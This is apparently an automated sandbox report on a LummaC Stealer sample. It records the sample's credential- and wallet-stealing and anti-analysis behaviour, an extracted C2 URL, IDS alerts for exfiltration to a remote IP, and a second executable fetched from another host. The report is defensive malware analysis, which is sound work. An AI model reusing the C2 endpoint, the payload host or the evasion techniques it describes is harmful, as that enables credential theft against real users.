Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561558
MD5:4b54e831bd5f7784815a385aa6e7d42b
SHA1:bd934fe052a441874e41294292bfcddc62dad5b9
SHA256:6eb0d802a04154bb0f3b0f7441ddef9a9367cd69ca5725085f1f83607437892f
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4B54E831BD5F7784815A385AA6E7D42B)
    • chrome.exe (PID: 8004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1984,i,11204049690359226366,8167700250922482004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1984,i,13680411521332787545,10737033242991967105,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2117012787.0000000001629000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2213209784.0000000001622000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2213156160.000000000161B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 7288JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: file.exe PID: 7288JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T19:01:05.930664+010020283713Unknown Traffic192.168.2.549704172.67.162.84443TCP
              2024-11-23T19:01:08.186511+010020283713Unknown Traffic192.168.2.549705172.67.162.84443TCP
              2024-11-23T19:01:11.466091+010020283713Unknown Traffic192.168.2.549706172.67.162.84443TCP
              2024-11-23T19:01:14.377133+010020283713Unknown Traffic192.168.2.549707172.67.162.84443TCP
              2024-11-23T19:01:18.079243+010020283713Unknown Traffic192.168.2.549708172.67.162.84443TCP
              2024-11-23T19:01:20.969673+010020283713Unknown Traffic192.168.2.549710172.67.162.84443TCP
              2024-11-23T19:01:24.104433+010020283713Unknown Traffic192.168.2.549713172.67.162.84443TCP
              2024-11-23T19:01:33.839931+010020283713Unknown Traffic192.168.2.549732172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T19:01:06.867648+010020546531A Network Trojan was detected192.168.2.549704172.67.162.84443TCP
              2024-11-23T19:01:09.802871+010020546531A Network Trojan was detected192.168.2.549705172.67.162.84443TCP
              2024-11-23T19:01:34.668332+010020546531A Network Trojan was detected192.168.2.549732172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T19:01:06.867648+010020498361A Network Trojan was detected192.168.2.549704172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T19:01:09.802871+010020498121A Network Trojan was detected192.168.2.549705172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T19:01:36.216604+010020197142Potentially Bad Traffic192.168.2.549738185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T19:01:21.679558+010020480941Malware Command and Control Activity Detected192.168.2.549710172.67.162.84443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: file.exe.7288.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
              Source: file.exeJoe Sandbox ML: detected
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49797 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.5:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.5:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49831 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2458062571.0000000008670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2552756176.0000000006732000.00000040.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49732 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.162.84:443
              Source: Malware configuration extractorURLs: https://property-imper.sbs/api
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 18:01:36 GMTContent-Type: application/octet-streamContent-Length: 2751488Last-Modified: Sat, 23 Nov 2024 17:33:35 GMTConnection: keep-aliveETag: "674211ef-29fc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 bf 7c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 79 71 73 66 64 65 74 00 a0 29 00 00 a0 00 00 00 9c 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 66 6d 65 78 62 78 6b 00 20 00 00 00 40 2a 00 00 04 00 00 00 d6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 da 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49732 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49738 -> 185.215.113.16:80
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49797 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bGZxU9wu8Nf8x8+&MD=5Ek2bgCM HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
